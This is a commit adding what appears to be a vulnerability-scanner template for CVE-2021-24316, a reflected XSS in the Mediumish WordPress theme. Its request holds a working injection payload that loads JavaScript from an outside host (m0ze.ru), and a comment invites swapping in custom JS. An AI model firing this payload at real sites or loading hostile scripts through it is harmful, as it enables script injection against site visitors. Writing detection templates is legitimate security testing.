Create CVE-2021-24316.yaml
parent
fcbe41f23d
commit
2171f7ec21
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2021-24316
|
||||||
|
|
||||||
|
info:
|
||||||
|
author: 0x_Akoko
|
||||||
|
description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
|
||||||
|
name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
|
||||||
|
severity: medium
|
||||||
|
tags: Mediumish,xss,wordpress
|
||||||
|
reference: |
|
||||||
|
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-24316
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
## you can edit this js file with your custom js. //m0ze.ru/payload/a2r.js decode it (base64) with your own.
|
||||||
|
- '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script src=https://m0ze.ru/payload/a2r.js></script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
Loading…
Reference in New Issue